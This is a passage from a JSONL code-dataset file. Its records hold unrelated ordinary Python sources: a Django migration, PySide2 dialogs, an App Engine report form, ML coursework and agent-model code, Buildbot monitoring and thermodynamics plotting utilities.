f\"http://localhost:{cfg.PAPERMILL_NOTEBOOK_REPORT_PORT}\",\n \"view\",\n analysis_notebook + \".\" + ns_parser.mode,\n )\n )\n\n print(\"\")\n print(\n \"Exported: \",\n os.path.join(\n os.path.abspath(os.path.join(\".\")), analysis_notebook + \".html\"\n ),\n \"\\n\",\n )\n\n except Exception as e:\n print(e, \"\\n\")\n except SystemExit:\n print(\"\")\n","sub_path":"gamestonk_terminal/stocks/report/due_diligence_view.py","file_name":"due_diligence_view.py","file_ext":"py","file_size_in_byte":2966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"400082508","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport datetime\nfrom django.utils.timezone import utc\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('summary', '0001_initial'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='workreport',\n name='created_datetime',\n field=models.DateTimeField(default=datetime.datetime(2015, 12, 21, 3, 3, 18, 470000, tzinfo=utc), verbose_name='Created at', auto_now_add=True),\n preserve_default=False,\n ),\n migrations.AddField(\n model_name='workreport',\n name='updated_datetime',\n field=models.DateTimeField(default=datetime.datetime(2015, 12, 21, 3, 3, 27, 741000, tzinfo=utc), verbose_name='Last Modified', auto_now=True),\n preserve_default=False,\n ),\n ]\n","sub_path":"src/cobra/apps/summary/migrations/0002_auto_20151221_1103.py","file_name":"0002_auto_20151221_1103.py","file_ext":"py","file_size_in_byte":905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"178276681","text":"# coding: utf-8\n\nimport sound\n\nfrom PySide2.QtWidgets import QHBoxLayout, QListView, QPushButton, QLabel, QVBoxLayout, QSlider, QStyle, QDialog, QDialogButtonBox, QMessageBox\nfrom PySide2.QtCore import QStringListModel, Qt, QModelIndex\nfrom functools import partial\n\n\nclass AddListDialog(QDialog):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n # Init variables\n model = QStringListModel()\n view = QListView()\n dialog_button = QDialogButtonBox(QDialogButtonBox.Ok | QDialogButtonBox.Cancel, Qt.Horizontal)\n self.voice_button = QPushButton(\"サンプル音声\")\n slider = QSlider(Qt.Horizontal)\n dummy_panel = QLabel()\n line_panel = QLabel(f\"{'-':->80}\")\n ex_panel = QLabel(\"説明:\")\n self.sub_label = QLabel()\n sub_lay = QVBoxLayout()\n voice_button_lay = QHBoxLayout()\n main_layout = QHBoxLayout()\n\n # Widgets\n model.setStringList([w for w in sound.data.values()])\n\n view.setModel(model)\n view.setEditTriggers(False)\n view.setCurrentIndex(model.index(0, 0))\n view.pressed.connect(self.on_pressed)\n\n self.obj: QModelIndex = view.currentIndex()\n\n ex_panel.setAlignment(Qt.AlignLeft | Qt.AlignBottom)\n\n self.sub_label.setAlignment(Qt.AlignTop | Qt.AlignHCenter)\n self.sub_label.setText(sound.data[0])\n\n self.voice_button.setFixedSize(70, 50)\n self.voice_button.clicked.connect(partial(sound.playSound, 0))\n\n slider.setRange(0, 100)\n slider.setValue(15)\n slider.valueChanged.connect(sound.setSoundVolume)\n\n dummy_panel.setPixmap(self.style().standardPixmap(QStyle.SP_MediaVolume))\n dummy_panel.setAlignment(Qt.AlignRight | Qt.AlignVCenter)\n\n dialog_button.accepted.connect(self.on_accepted)\n dialog_button.rejected.connect(self.reject)\n\n # Voice Button Layout\n voice_button_lay.addWidget(dummy_panel, 3)\n voice_button_lay.addWidget(slider, 1)\n voice_button_lay.addSpacing(10)\n voice_button_lay.addWidget(self.voice_button, 2)\n\n # Details Layout\n sub_lay.addWidget(ex_panel, 1)\n sub_lay.addWidget(line_panel, 1)\n sub_lay.addWidget(self.sub_label, 5)\n sub_lay.addLayout(voice_button_lay)\n sub_lay.addSpacing(20)\n sub_lay.addWidget(dialog_button)\n\n # Main Layout\n main_layout.addWidget(view, 4)\n main_layout.addSpacing(20)\n main_layout.addLayout(sub_lay, 9)\n main_layout.addSpacing(20)\n\n self.setLayout(main_layout)\n self.setFixedSize(700, 450)\n\n def on_pressed(self, obj):\n self.obj = obj\n self.sub_label.setText(sound.data[obj.row()])\n self.voice_button.clicked.connect(partial(sound.playSound, self.obj.row()))\n\n def on_accepted(self):\n for i in range(self.parent().layout().count()):\n c = self.parent().layout().itemAt(i).widget()\n if isinstance(c, QPushButton):\n if c.text() == self.obj.data():\n box = QMessageBox()\n box.setText(\"This voice is already registered!\")\n box.exec_()\n return self\n\n self.accept()\n\n\nclass RemoveListDialog(QDialog):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n # Init Variables\n self.word_list = []\n model = QStringListModel()\n view = QListView()\n dialog_button = QDialogButtonBox(QDialogButtonBox.Ok | QDialogButtonBox.Cancel, Qt.Horizontal)\n line_panel = QLabel(f\"{'-':->80}\")\n ex_panel = QLabel(\"説明:\")\n self.sub_label = QLabel()\n sub_lay = QVBoxLayout()\n main_layout = QHBoxLayout()\n\n # Widgets\n for i in range(self.parent().layout().count()):\n c = self.parent().layout().itemAt(i).widget()\n if isinstance(c, QPushButton):\n self.word_list.append(c.text())\n\n model.setStringList(self.word_list)\n\n view.setModel(model)\n view.setEditTriggers(False)\n view.setCurrentIndex(model.index(0, 0))\n view.pressed.connect(self.on_pressed)\n\n self.obj: QModelIndex = view.currentIndex()\n\n ex_panel.setAlignment(Qt.AlignLeft | Qt.AlignBottom)\n\n self.sub_label.setAlignment(Qt.AlignTop | Qt.AlignHCenter)\n if self.word_list:\n self.sub_label.setText(self.word_list[0])\n\n dialog_button.accepted.connect(self.accept)\n dialog_button.rejected.connect(self.reject)\n\n # Sub Layout\n sub_lay.addWidget(ex_panel, 1)\n sub_lay.addWidget(line_panel, 1)\n sub_lay.addWidget(self.sub_label, 6)\n sub_lay.addSpacing(20)\n sub_lay.addWidget(dialog_button)\n\n # Main Layout\n main_layout.addWidget(view, 4)\n main_layout.addSpacing(20)\n main_layout.addLayout(sub_lay, 9)\n main_layout.addSpacing(20)\n\n self.setLayout(main_layout)\n self.setFixedSize(700, 450)\n\n def on_pressed(self, obj):\n self.obj = obj\n self.sub_label.setText(self.word_list[obj.row()])\n","sub_path":"list.py","file_name":"list.py","file_ext":"py","file_size_in_byte":5152,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"214354883","text":"import webapp2\n\nfrom google.appengine.api import users\n\nimport urllib\nfrom google.appengine.api import urlfetch\n\nimport website\n\n\nclass PortalHandler(webapp2.RequestHandler):\n def get(self):\n variables = {}\n self.response.write(website.render('portal.html', variables))\n\n\nclass SubmitHandler(webapp2.RequestHandler):\n def get(self):\n self.redirect('/found')\n\n def post(self):\n form_url = \"https://docs.google.com/forms/d/1Zc3t0IcdEBH-tqWWDsjBFMVEy05G0IvHhsW9DPHh-Zs/formResponse\"\n params_out = {'entry.2069079998': self.request.get('id'),\n 'entry.1116429470': self.request.get('loc'),\n 'entry.64319261': self.request.get('note'),\n 'entry.1628696689': self.request.get('user'),\n 'entry.1699739988': self.request.get('ref'),\n 'entry.1529275179': self.request.remote_addr,\n 'entry.914723343': self.request.user_agent}\n\n form_data = urllib.urlencode(params_out)\n result = urlfetch.fetch(\n url=form_url,\n payload=form_data,\n method=urlfetch.POST,\n headers={'Content-Type': 'application/x-www-form-urlencoded'}\n )\n\n if result:\n self.response.write('Report sent. Thank you!')\n\napp = webapp2.WSGIApplication([\n ('/submit', SubmitHandler),\n ('/portal', PortalHandler),\n], debug=True)\n","sub_path":"portal.py","file_name":"portal.py","file_ext":"py","file_size_in_byte":1434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"524401562","text":"#!/usr/bin/python\n\n\"\"\" \n This is the code to accompany the Lesson 2 (SVM) mini-project.\n\n Use a SVM to identify emails from the Enron corpus by their authors: \n Sara has label 0\n Chris has label 1\n\"\"\"\n \nimport sys\nfrom time import time\nsys.path.append(\"../tools/\")\nfrom email_preprocess import preprocess\nfrom sklearn.svm import SVC\n\n### features_train and features_test are the features for the training\n### and testing datasets, respectively\n### labels_train and labels_test are the corresponding item labels\n\nfeatures_train, features_test, labels_train, labels_test = preprocess()\n\n\n\n\n\nprint('hi')\nsvm_tester = SVC(kernel = \"rbf\", C = 10000)\nprint('r')\nsvm_tester.fit(features_train, labels_train)\nprint('this is booty')\n#print(svm_tester.score(features_test, labels_test))\npred = svm_tester.predict(features_test)\ncount = 0\nfor i in pred:\n if i:\n count += 1\nprint(count)\n\n#print svm_tester.accuracy()\n#########################################################\n### your code goes here ###\n\n#########################################################","sub_path":"intro-machine-learning-coursework/svm/svm_author_id.py","file_name":"svm_author_id.py","file_ext":"py","file_size_in_byte":1077,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"605409530","text":"from collections import OrderedDict\n\n\ndef ex1():\n ordered_dictionary = OrderedDict()\n ordered_dictionary[\"a\"] = 1\n ordered_dictionary[\"a\"] += +1\n ordered_dictionary[\"a\"] += 3\n ordered_dictionary[\"b\"] = 3\n print(ordered_dictionary)\n\n\nn = int(input())\nshop = []\nitem_name = []\nnet_price = []\nproducts = OrderedDict()\n\nfor i in range(n):\n shop.append(input())\n\nfor i in range(len(shop)): # dict of words\n words = shop[i].split()\n key_join = \" \".join(words[:-1])\n value = int(words[-1])\n products[key_join] = 0\n\nfor k in range(len(shop)): # put values to key\n words = shop[k].split()\n key_join = \" \".join(words[:-1])\n value = int(words[-1])\n products[key_join] += value\n\nitem_name = list(products.keys())\nitem_price = list(products.values())\n\nfor u in range(len(item_name)):\n print(str(item_name[u]) + \" \" + str(item_price[u]))\n","sub_path":"Python_HackerRank/Collections/collectionsOrderedDict.py","file_name":"collectionsOrderedDict.py","file_ext":"py","file_size_in_byte":874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"499217026","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Oct 4 23:12:15 2019\n\n@author: abhijithneilabraham\n\"\"\"\nimport random\nimport time\nfrom playsound import playsound\nc=int(input('write in number how much you love a cat \\n')) \ndef catran():\n a=random.randint(97,136)\n if a>=97 and a<=103:\n playsound('cataudios/cat1.mp3') #cat1.mp3, cat2.mp3, cat3.mp3 and cat4.mp3 is provided in the repo\n if a>103 and a<=110:\n playsound('cataudios/cat2.mp3')\n if a>110 and a<=117:\n playsound('cataudios/cat3.mp3')\n if a>117 and a<=122:\n playsound('cataudios/cat4.mp3')\n if a>122 and a<=129:\n playsound('cataudios/cat5.mp3')\n if a>129 and a<136:\n playsound('cataudios/cat6.mp3')\n print(chr(a),end=\"\")\nr=0.05\nfor i in range(c):\n \n if i%5==0:\n r=random.uniform(0.01,0.2)\n time.sleep(r)\n catran()\nprint(\"\\n Oops,cat ran\",str(c),\"times through ya keyboard!\")\n \n\n \n","sub_path":"kat_ran/kat.py","file_name":"kat.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"586397276","text":"# Copyright 2016 The Chromium Authors. All rights reserved.\n# Use of this source code is governed by a BSD-style license that can be\n# found in the LICENSE file.\n\nimport collections\nimport time\n\nfrom buildbot.status.base import StatusReceiverMultiService\nfrom twisted.internet import defer, reactor, task\nfrom twisted.python import log, threadpool\n\nfrom infra_libs import ts_mon\n\nuptime = ts_mon.FloatMetric('buildbot/master/uptime',\n description='Time (in seconds) since the master was started')\naccepting_builds = ts_mon.BooleanMetric('buildbot/master/accepting_builds',\n description='Whether the master\\'s BuildRequestDistributor is running')\n\nconnected = ts_mon.GaugeMetric('buildbot/master/builders/connected_slaves',\n description='Number of slaves currently connected, per builder')\ncurrent_builds = ts_mon.GaugeMetric('buildbot/master/builders/current_builds',\n description='Number of builds currently running, per builder')\npending_builds = ts_mon.GaugeMetric('buildbot/master/builders/pending_builds',\n description='Number of builds pending, per builder')\nstate = ts_mon.StringMetric('buildbot/master/builders/state',\n description='State of this builder - building, idle, or offline')\ntotal = ts_mon.GaugeMetric('buildbot/master/builders/total_slaves',\n description='Number of slaves configured on this builder - connected or '\n 'not')\n\npool_queue = ts_mon.GaugeMetric('buildbot/master/thread_pool/queue',\n description='Number of runnables queued in the database thread pool')\npool_waiting = ts_mon.GaugeMetric('buildbot/master/thread_pool/waiting',\n description='Number of idle workers for the database thread pool')\npool_working = ts_mon.GaugeMetric('buildbot/master/thread_pool/working',\n description='Number of running workers for the database thread pool')\n\nSERVER_STARTED = time.time()\n\n\nclass MonitoringStatusReceiver(StatusReceiverMultiService):\n \"\"\"Flushes ts_mon metrics once per minute.\"\"\"\n\n def __init__(self):\n StatusReceiverMultiService.__init__(self)\n self.status = None\n self.thread_pool = threadpool.ThreadPool(1, 1)\n self.loop = task.LoopingCall(self.updateMetricsAndFlush)\n\n def startService(self):\n StatusReceiverMultiService.startService(self)\n self.status = self.parent.getStatus()\n self.status.subscribe(self)\n\n self.thread_pool.start()\n self.loop.start(60, now=False)\n\n def stopService(self):\n self.loop.stop()\n self.thread_pool.stop()\n return StatusReceiverMultiService.stopService(self)\n\n @defer.inlineCallbacks\n def updateMetricsAndFlush(self):\n try:\n yield self.updateMetrics()\n finally:\n self.thread_pool.callInThread(self._flush_and_log_exceptions)\n\n @defer.inlineCallbacks\n def updateMetrics(self):\n uptime.set(time.time() - SERVER_STARTED, fields={'master': ''})\n accepting_builds.set(bool(self.status.master.botmaster.brd.running),\n fields={'master': ''})\n pool = self.status.master.db.pool\n pool_queue.set(pool.q.qsize(), fields={'master': ''})\n pool_waiting.set(len(pool.waiters), fields={'master': ''})\n pool_working.set(len(pool.working), fields={'master': ''})\n\n for builder_name in self.status.getBuilderNames():\n fields = {'builder': builder_name, 'master': ''}\n builder = self.status.getBuilder(builder_name)\n slaves = builder.getSlaves()\n\n connected.set(sum(1 for x in slaves if x.connected), fields=fields)\n current_builds.set(len(builder.getCurrentBuilds()), fields=fields)\n state.set(builder.currentBigState, fields=fields)\n total.set(len(slaves), fields=fields)\n\n # Get pending build requests directly from the db for all builders at\n # once.\n d = self.status.master.db.buildrequests.getBuildRequests(claimed=False)\n\n # Timeout the database request after 5 seconds.\n def timeout():\n if not d.called:\n d.cancel()\n reactor.callLater(5, timeout)\n\n try:\n brdicts = yield d\n except Exception as ex:\n log.err(ex, 'getBuildRequests failed while failed populating metrics')\n else:\n pending_per_builder = collections.defaultdict(int)\n for brdict in brdicts:\n pending_per_builder[brdict['buildername']] += 1\n\n for builder_name, count in pending_per_builder.iteritems():\n pending_builds.set(count,\n fields={'builder': builder_name, 'master': ''})\n\n def _flush_and_log_exceptions(self):\n try:\n ts_mon.flush()\n except Exception:\n log.err(None, 'Automatic monitoring flush failed.')\n","sub_path":"scripts/master/monitoring_status_receiver.py","file_name":"monitoring_status_receiver.py","file_ext":"py","file_size_in_byte":4530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"455698776","text":"import os\nimport pickle\nimport time\nfrom pathlib import Path\nfrom shutil import copyfile\nfrom typing import Any, Callable, Dict, List, Optional, Tuple, cast\n\nimport numpy as np\nimport srsly\nimport tensorflow as tf\nfrom tensorflow.keras import backend as K\nfrom tf_siren import SinusodialRepresentationDense, SIRENModel\nfrom wasabi import msg\n\nfrom mathy_core.expressions import MathTypeKeysMax\nfrom ..env import MathyEnv\nfrom ..envs import PolySimplify\nfrom ..state import (\n MathyInputsType,\n MathyObservation,\n MathyWindowObservation,\n ObservationFeatureIndices,\n observations_to_window,\n)\nfrom mathy_core.util import print_error\nfrom .config import AgentConfig\n\n\ndef build_agent_model(\n config: AgentConfig = None, predictions: int = 6, name=\"embeddings\"\n) -> tf.keras.Model:\n if config is None:\n config = AgentConfig()\n nodes_in = tf.keras.layers.Input(shape=(None,), dtype=tf.int32, name=\"nodes_in\")\n values_in = tf.keras.layers.Input(shape=(None,), dtype=tf.float32, name=\"values_in\")\n type_in = tf.keras.layers.Input(shape=(None, 2), dtype=tf.float32, name=\"type_in\")\n time_in = tf.keras.layers.Input(shape=(None, 1), dtype=tf.float32, name=\"time_in\")\n token_embedding = tf.keras.layers.Embedding(\n input_dim=MathTypeKeysMax,\n output_dim=config.embedding_units,\n name=\"nodes_input\",\n mask_zero=True,\n )\n values_dense = SinusodialRepresentationDense(\n config.units,\n name=\"values_input\",\n kernel_initializer=\"siren_first_uniform\",\n w0=30.0,\n )\n type_dense = SinusodialRepresentationDense(\n config.units,\n name=\"type_input\",\n kernel_initializer=\"siren_first_uniform\",\n w0=30.0,\n )\n time_dense = SinusodialRepresentationDense(\n config.units,\n name=\"time_input\",\n kernel_initializer=\"siren_first_uniform\",\n w0=30.0,\n )\n siren_mlp = SIRENModel(\n units=config.units, final_units=config.units, num_layers=6, name=\"siren\",\n )\n policy_net = tf.keras.Sequential(\n [\n tf.keras.layers.TimeDistributed(\n SinusodialRepresentationDense(\n predictions, name=\"policy_ts_hidden\", activation=None,\n ),\n name=\"policy_logits\",\n ),\n tf.keras.layers.LayerNormalization(name=\"policy_layer_norm\"),\n ],\n name=\"policy_head\",\n )\n value_net = tf.keras.Sequential(\n [\n SinusodialRepresentationDense(config.units, name=\"value_hidden\"),\n SinusodialRepresentationDense(1, name=\"value_logits\", activation=None),\n ],\n name=\"value_head\",\n )\n reward_net = tf.keras.Sequential(\n [\n SinusodialRepresentationDense(\n config.units, name=\"reward_hidden\", activation=\"relu\",\n ),\n tf.keras.layers.LayerNormalization(name=\"reward_layer_norm\"),\n SinusodialRepresentationDense(1, name=\"reward_logits\", activation=None),\n ],\n name=\"reward_head\",\n )\n # Model\n sequence_inputs = siren_mlp(\n tf.concat(\n [\n token_embedding(nodes_in),\n values_dense(tf.expand_dims(values_in, axis=-1)),\n type_dense(type_in),\n time_dense(time_in),\n ],\n axis=-1,\n name=\"input_vectors\",\n )\n )\n sequence_mean = tf.reduce_mean(sequence_inputs, axis=1)\n values = value_net(sequence_mean)\n reward_logits = reward_net(sequence_mean)\n logits = policy_net(sequence_inputs)\n inputs = [\n nodes_in,\n values_in,\n type_in,\n time_in,\n ]\n outputs = [logits, values, reward_logits]\n out_model = tf.keras.Model(inputs=inputs, outputs=outputs, name=name)\n\n lr_schedule = tf.keras.optimizers.schedules.ExponentialDecay(\n config.lr_initial,\n decay_steps=config.lr_decay_steps,\n decay_rate=config.lr_decay_rate,\n staircase=config.lr_decay_staircase,\n )\n out_model.opt = tf.keras.optimizers.Adam(learning_rate=lr_schedule)\n out_model.predictions = predictions\n return out_model\n\n\nAgentModel = tf.keras.Model\n\n\ndef _load_model(model_path: Path, predictions: int) -> AgentModel:\n model = tf.keras.models.load_model(str(model_path))\n model.opt = model.optimizer\n model.predictions = predictions\n return model\n\n\ndef get_or_create_agent_model(\n config: AgentConfig,\n predictions: int,\n is_main=False,\n required=False,\n env: MathyEnv = None,\n) -> AgentModel:\n if env is None:\n env = PolySimplify()\n observation: MathyObservation = env.state_to_observation(env.get_initial_state()[0])\n initial_state: MathyWindowObservation = observations_to_window([observation])\n\n if not os.path.exists(config.model_dir):\n os.makedirs(config.model_dir)\n model_path: Path = Path(config.model_dir) / config.model_name\n model = build_agent_model(config=config, predictions=predictions, name=\"agent\")\n model.compile(optimizer=model.opt, loss=\"binary_crossentropy\", metrics=[\"accuracy\"])\n model.build(initial_state.to_input_shapes())\n if model_path.is_dir():\n if is_main and config.verbose:\n with msg.loading(f\"Loading model: {model_path}...\"):\n model = _load_model(model_path, predictions)\n msg.good(f\"Loaded model: {model_path}\")\n else:\n model = _load_model(model_path, predictions)\n elif required:\n print_error(\n ValueError(\"Model Not Found\"),\n f\"Cannot find model: {model_path}\",\n print_error=False,\n )\n elif is_main:\n cfg = f\"{config.model_dir}{os.path.sep}model.config.json\"\n if config.verbose:\n msg.info(f\"wrote model config: {cfg}\")\n srsly.write_json(cfg, config.dict(exclude_defaults=False))\n\n return model\n\n\ndef load_agent_model(\n model_data_folder: str, silent: bool = False\n) -> Tuple[AgentModel, AgentConfig]:\n meta_file = Path(model_data_folder) / \"model.config.json\"\n if not meta_file.exists():\n raise ValueError(f\"model meta not found: {meta_file}\")\n args = AgentConfig(**srsly.read_json(str(meta_file)))\n model_file = Path(model_data_folder) / args.model_name\n if not model_file.exists():\n raise ValueError(f\"model not found: {model_file}\")\n env: MathyEnv = PolySimplify()\n observation: MathyObservation = env.state_to_observation(env.get_initial_state()[0])\n initial_state: MathyWindowObservation = observations_to_window([observation])\n init_inputs = initial_state.to_inputs()\n init_shapes = initial_state.to_input_shapes()\n model: AgentModel = build_agent_model(\n config=args, predictions=env.action_size, name=\"agent\"\n )\n model.compile(optimizer=model.opt, loss=\"mse\", metrics=[\"accuracy\"])\n model.build(init_shapes)\n model.predict(init_inputs)\n\n if not silent:\n with msg.loading(f\"Loading model: {model_file}...\"):\n _load_model(model_file, env.action_size)\n msg.good(f\"Loaded model: {model_file}\")\n model.summary()\n else:\n _load_model(model_file, env.action_size)\n return model, args\n","sub_path":"libraries/mathy_python/mathy/agent/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":7196,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"143365829","text":"# -*- coding: utf-8 -*-\n\"\"\"\nEmpirical models.\n\"\"\"\n\nimport inspect\nimport numpy as np\nfrom matplotlib import pyplot as plt\nfrom warnings import warn\nfrom scipy.stats import variation\nfrom PyMuTT import _pass_expected_arguments\nfrom PyMuTT import constants as c\nfrom pprint import pprint\n\nclass BaseThermo:\n \"\"\"The Thermodynamic Parent class.\n Holds properties of a specie, the statistical-mechanical thermodynamic model.\n\n Attributes\n ----------\n name : str\n Name of the specie.\n phase : str\n Phase of the specie.\n G - gas.\n S - surface.\n elements : dict\n Composition of the species.\n Keys of dictionary are elements, values are stoichiometric values in a formula unit.\n e.g. CH3OH can be represented as:\n {'C': 1, 'H': 4, 'O': 1,}.\n thermo_model : `PyMuTT.models.statmech` object\n Statistical thermodynamic model.\n Object should have the following methods: `get_CpoR`, `get_HoRT`, `get_SoR`, `get_GoRT`.\n T_ref : float\n Temperature (in K) at which `HoRT_dft` was calculated. Only used for fitting empirical coefficients.\n HoRT_dft : float\n Dimensionless enthalpy calculated using DFT that corresponds to `T_ref`. Only used for fitting empirical coefficients.\n HoRT_ref : float\n Reference dimensionless enthalpy corresponding to `T_ref`.\n references : `PyMuTT.models.empirical.References.references` object\n Contains references to calculate `HoRT_ref`. If not specified then HoRT_dft will be used without adjustment.\n notes : str\n Any additional details you would like to include such as computational set up.\n\n \"\"\"\n\n def __init__(self, name, phase=None, elements=None, thermo_model=None,\n T_ref=c.T0('K'), HoRT_dft=None, HoRT_ref=None,\n references=None, notes=None, **kwargs):\n self.name = name\n self.phase = phase\n self.elements = elements\n self.T_ref = T_ref\n self.references = references\n self.notes = notes\n\n #Assign self.thermo_model\n if inspect.isclass(thermo_model):\n #If class is passed, the required arguments will be guessed.\n self.thermo_model = _pass_expected_arguments(thermo_model, **kwargs)\n else:\n self.thermo_model = thermo_model\n\n #Calculate dimensionless DFT energy using thermo model\n if (HoRT_dft is None) and (self.thermo_model is not None):\n self.HoRT_dft = self.thermo_model.get_HoRT(Ts=self.T_ref)\n else:\n self.HoRT_dft = HoRT_dft\n\n if HoRT_ref is None: #Assign self.HoRT_ref\n if (references is None) or (self.HoRT_dft is None):\n self.HoRT_ref = self.HoRT_dft\n else:\n self.HoRT_ref = self.HoRT_dft + references.get_HoRT_offset(\n elements=elements, Ts=self.T_ref)\n else:\n self.HoRT_ref = HoRT_ref\n\n def __repr__(self):\n out = ['{} object for Name: {}'.format(\n self.__class__.__name__, self.name)]\n for key, val in self.__dict__.items():\n if key != 'name':\n out.append('\\t{}: {}'.format(key, val))\n return '\\n'.join(out)\n\n\n def plot_empirical(self, T_low=None, T_high=None, Cp_units=None,\n H_units=None, S_units=None, G_units=None):\n \"\"\"Plot the thermodynamic profiles between ``T_low`` and ``T_high``\n using empirical relationship\n\n Parameters:\n T_low : float\n Lower temperature in K. If not specified, ``T_low`` attribute\n used.\n T_high : float\n Upper temperature in K. If not specified, ``T_high`` attribute\n used.\n Cp_units : str\n Units to plot heat capacity. See ``PyMuTT.constants.R`` for\n accepted units. If not specified, dimensionless units used.\n H_units : str\n Units to plot enthalpy. See ``PyMuTT.constants.R`` for accepted\n units but omit the '/K' (e.g. J/mol). If not specified,\n dimensionless units used.\n S_units : str\n Units to plot entropy. See ``PyMuTT.constants.R`` for accepted\n units. If not specified, dimensionless units used.\n G_units : str\n Units to plot Gibbs free energy. See ``PyMuTT.constants.R`` for\n accepted units but omit the '/K' (e.g. J/mol). If not specified,\n dimensionless units used.\n\n Returns:\n figure : `matplotlib.figure.Figure`_\n Figure\n axes : tuple of `matplotlib.axes.Axes.axis`_\n Axes of the plots.\n 0. Cp\n 1. H\n 2. S\n 3. G\n \"\"\"\n if T_low is None:\n T_low = self.T_low\n if T_high is None:\n T_high = self.T_high\n Ts = np.linspace(T_low, T_high)\n\n f, ax = plt.subplots(4, sharex=True)\n '''\n Heat Capacity\n '''\n ax[0].set_title('Specie: {}'.format(self.name))\n Cp_plot = np.array(map(self.get_CpoR, Ts))\n if Cp_units is None:\n ax[0].set_ylabel('Cp/R')\n else:\n ax[0].set_ylabel('Cp ({})'.format(Cp_units))\n Cp_plot *= c.R(Cp_units)\n ax[0].plot(Ts, Cp_plot, 'r-')\n\n '''\n Enthalpy\n '''\n H_plot = np.array(map(self.get_HoRT, Ts))\n if H_units is None:\n ax[1].set_ylabel('H/RT')\n else:\n ax[1].set_ylabel('H ({})'.format(H_units))\n H_plot *= c.R('{}/K'.format(H_units)) * Ts\n ax[1].plot(Ts, H_plot, 'g-')\n\n '''\n Entropy\n '''\n S_plot = np.array(map(self.get_SoR, Ts))\n if S_units is None:\n ax[2].set_ylabel('S/R')\n else:\n ax[2].set_ylabel('S ({})'.format(S_units))\n S_plot *= c.R(S_units)\n ax[2].plot(Ts, S_plot, 'b-')\n\n '''\n Gibbs energy\n '''\n ax[3].set_xlabel('Temperature (K)')\n G_plot = np.array(map(self.get_GoRT, Ts))\n if G_units is None:\n ax[3].set_ylabel('G/RT')\n else:\n ax[3].set_ylabel('G ({})'.format(G_units))\n G_plot *= c.R('{}/K'.format(G_units)) * Ts\n ax[3].plot(Ts, G_plot, 'k-')\n\n return f, ax\n\n def plot_thermo_model(self, T_low=None, T_high=None, Cp_units=None,\n H_units=None, S_units=None, G_units=None):\n \"\"\"Plots the thermodynamic profiles between ``T_low`` and ``T_high``\n using empirical relationship\n\n Parameters:\n T_low : float\n Lower temperature in K.\n T_high : float\n Upper temperature in K.\n Cp_units : str\n Units to plot heat capacity. See ``PyMuTT.constants.R`` for\n accepted units. If not specified, dimensionless units used.\n H_units : str\n Units to plot enthalpy. See ``PyMuTT.constants.R`` for\n accepted units but omit the '/K' (e.g. J/mol). If not\n specified, dimensionless units used.\n S_units : str\n Units to plot entropy. See ``PyMuTT.constants.R`` for accepted\n units. If not specified, dimensionless units used.\n G_units : str\n Units to plot Gibbs free energy. See ``PyMuTT.constants.R`` for\n accepted units but omit the '/K' (e.g. J/mol). If not specified,\n dimensionless units used.\n\n Returns:\n figure : `matplotlib.figure.Figure`_\n Figure\n axes : tuple of `matplotlib.axes.Axes.axis`_\n Axes of the plots.\n 0. Cp\n 1. H\n 2. S\n 3. G\n \"\"\"\n if T_low is None:\n T_low = self.T_low\n if T_high is None:\n T_high = self.T_high\n Ts = np.linspace(T_low, T_high)\n\n f, ax = plt.subplots(4, sharex=True)\n '''\n Heat Capacity\n '''\n ax[0].set_title('Specie: {}'.format(self.name))\n Cp_plot = np.array(map(self.thermo_model.get_CpoR, Ts))\n if Cp_units is None:\n ax[0].set_ylabel('Cp/R')\n else:\n ax[0].set_ylabel('Cp ({})'.format(Cp_units))\n Cp_plot *= c.R(Cp_units)\n ax[0].plot(Ts, Cp_plot, 'r-')\n\n '''\n Enthalpy\n '''\n H_plot = np.array(map(self.thermo_model.get_HoRT, Ts))\n # The below function also need to take single temp\n if self.references is not None:\n offsets = np.array(\n self.references.get_HoRT_offset(elements=self.elements, Ts=Ts))\n H_plot += offsets\n\n if H_units is None:\n ax[1].set_ylabel('H/RT')\n else:\n ax[1].set_ylabel('H ({})'.format(H_units))\n H_plot *= c.R('{}/K'.format(H_units)) * Ts\n ax[1].plot(Ts, H_plot, 'g-')\n\n '''\n Entropy\n '''\n S_plot = np.array(map(self.thermo_model.get_SoR, Ts))\n if S_units is None:\n ax[2].set_ylabel('S/R')\n else:\n ax[2].set_ylabel('S ({})'.format(S_units))\n S_plot *= c.R(S_units)\n ax[2].plot(Ts, S_plot, 'b-')\n\n '''\n Gibbs energy\n '''\n ax[3].set_xlabel('Temperature (K)')\n G_plot = np.array(map(self.thermo_model.get_GoRT, Ts))\n if self.references is not None:\n offsets = np.array(\n self.references.get_HoRT_offset(elements=self.elements, Ts=Ts))\n G_plot += offsets\n\n if G_units is None:\n ax[3].set_ylabel('G/RT')\n else:\n ax[3].set_ylabel('G ({})'.format(G_units))\n G_plot *= c.R('{}/K'.format(G_units)) * Ts\n ax[3].plot(Ts, G_plot, 'k-')\n\n return f, ax\n\n def plot_thermo_model_and_empirical(self, T_low=None, T_high=None,\n Cp_units=None, H_units=None,\n S_units=None, G_units=None):\n \"\"\"Plots the thermodynamic profiles between ``T_low`` and ``T_high``\n using empirical relationship\n\n Parameters:\n T_low : float\n Lower temperature in K.\n T_high : float\n Upper temperature in K.\n Cp_units : str\n Units to plot heat capacity. See 